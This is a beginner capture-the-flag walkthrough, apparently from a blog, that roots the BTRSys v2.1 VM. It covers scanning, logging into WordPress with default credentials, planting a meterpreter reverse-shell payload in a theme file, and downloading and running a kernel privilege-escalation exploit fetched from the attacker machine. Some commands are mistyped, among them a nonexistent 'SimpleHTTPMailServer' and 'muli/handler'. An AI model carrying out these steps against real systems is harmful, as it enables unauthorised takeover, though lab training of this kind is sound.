BTRSys: v2.1 walkthrough
Hii friends .. welcome 2 hackxsploit. Here is the complete walkthrough of BTRSys : v2.1 CTF . It is beginner level CTF. Download it from here. This is Boot2Root - CTF VM. I hope you enjoy it
So let's crack.
Objective : Get the the Root access of System
Attacking Machine : Linux kali 4.17.0-kali1-amd64 Objective : Get the the Root access of System
Target machine : BTRSys: v2.1 ip: 172.16.166.149
**It is recommended that use nmap , Dirb & nikto first for scan the ip **
--------------------------------------------------------------------------------------------------------------------------------
lets start from getting ip of BTRsys vm by this command;
# arp-scan -l
Now Scan ip by nmap
# nmap http://172.16.166.149 -sSCV
# dirb http:// 172.16.166.149
http:// 172.16.166.149
Now open http:// 172.16.166.149/robots.txt.
Its shows a directory list wordpress.
Now open http:// 172.16.166.149/wordpress
it's confirm that it is wordpress site.
After it we go http:// 172.16.166.149/wordpress/wp-admin
login into wordpress by hit and try metod.
id = admin
password = admin
here we can put reverse backdoor payload by help of msfvenon and listen by metasploit.
so open terminal and type
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.166.163 lport=4444
after it copy code from terminal
Now paste this code into the page of wordpress.
appearance -- >editor ---> 404.php
**remove the exixting code and then paste this code***
click on update file . **
here our backdoor code is pasted.
Now start our metasploit to listen . and type the following command;
use exploit/muli/handler/
set payload php/meterpreter/reverse_tcp
set lhost 172.16.166.163 <its my local ip>
set lport 4444
exploit
http://172.16.166.149/wordpress/wp-content/themes/twentyfourteen/404.php
By this url our payload will execute and give meterpreter session.
we got our meterpreter shell.
Here we got shell but cant access root.
so we have to download exploit for local priviilage exclation by this link.
https://www.exploit-db.com/exploits/44298/
Now for root acces we use this exploit. from dbexploit.
Download this exploit in your kali and paste into target machine by creating local python mail server.
*** download exploit in your kali And go to download folder.
compile 44298.c by this command by terminal
# gcc 44298.c -o 44298
***create local server by this commnd in your kali
# python -m SimpleHTTPMailServer 8080
***Now go to in your meterpreter shell and type this command
cd /tmp
wget http://172.16.166.163:8080/44298
chmod 777 44298
./44298
after it we have got root.
Test it by whoami command.
**** if u have problem in accssing exploit in meterpreter then the read about How to create local python mail server and How to access any exploit in our meterpreter by creating local python mailserver *****
***Read about local privilege exclation it plays crucial role in any Ctf ****
give feedback to
princelucideus121@gmail.com
Comments
Post a Comment